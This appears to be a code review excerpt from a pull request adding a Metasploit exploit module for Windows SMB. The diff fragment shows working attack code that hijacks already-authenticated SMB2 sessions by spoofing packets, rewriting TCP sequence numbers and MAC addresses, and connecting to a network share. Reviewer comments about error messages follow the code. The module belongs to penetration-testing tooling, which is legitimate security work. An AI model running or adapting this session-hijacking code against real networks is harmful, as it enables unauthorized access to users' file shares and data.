modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,649 @@
+          if smb_packet.smb2_header.session_id != 0
+            # Disable Session
+            @sessions[packet.tcp_header.tcp_src][:active] = false
+            @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum]
+            @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum]
+            # Start Main Thread
+            @main_threads << Thread.new { main_thread(packet) }
+          end
+        end
+      end
+      if @sessions[packet.tcp_header.tcp_src] && @sessions[packet.tcp_header.tcp_src][:active]
+        @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum]
+        @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum]
+        packet.tcp_header.tcp_ack = @sessions[packet.tcp_header.tcp_src][:acknum]
+        packet.tcp_header.tcp_seq = @sessions[packet.tcp_header.tcp_src][:seqnum]
+        packet.eth_header.eth_src = str2mac(@mac)
+        packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac])
+        packet.recalc
+        packet.to_w(@interface)
+      end
+    end
+  end
+
+  # This handles a session that has already authenticated to the server.
+  # This allows us to offload the session from the main capture thead.
+  def main_thread(packet)
+    # Setup Vars
+    tree_id = 0
+    process_id = 0
+    eth_src = str2mac(@mac)
+    eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac])
+    packet.tcp_header.tcp_ack = @sessions[packet.tcp_header.tcp_src][:acknum]
+    packet.tcp_header.tcp_seq = @sessions[packet.tcp_header.tcp_src][:seqnum]
+    packet.eth_header.eth_src = eth_src
+    packet.eth_header.eth_dst = eth_dst
+    response = get_response(packet)
+    response_smb2 = RubySMB::SMB2::Packet::SessionSetupResponse.read(response.payload[4..-1])
+
+    print_status("Connecting to the defined share...")
+    request = RubySMB::SMB2::Packet::TreeConnectRequest.new
+    set_request_smb2_header_flags(request, tree_id, process_id, response_smb2)
+    request.path = "\\\\#{ip2str(int2ip(response.ip_header.ip_src))}\\#{@share}"
+    eth_header = PacketFu::EthHeader.new(
+      eth_src: eth_src,
+      eth_dst: eth_dst
+    )
+    ip_header = PacketFu::IPHeader.new(
+      ip_src: int2ip(response.ip_header.ip_dst),
+      ip_dst: int2ip(response.ip_header.ip_src)
+    )
+    packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response))
+    packet.payload = "#{[request.to_binary_s.size].pack("L>")}#{request.to_binary_s}"
+    response = get_response(packet)
+    response_smb2 = RubySMB::SMB2::Packet::TreeConnectResponse.read(response.payload[4..-1])
+    if response_smb2.smb2_header.nt_status != 0
+      raise "Access Denied."
```

Comment:
The `fail_with` pattern mentioned above might be useful here too :+1:

Reply:
Is it possible to enhance this error message with the `nt_status` code, I believe this should work (not tested):

```suggestion
      fail_with(Failure::UnexpectedReply, "Unexpected tree connect response #{e.status_code.value.inspect} (#{ ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first || 'unknown' })) 
```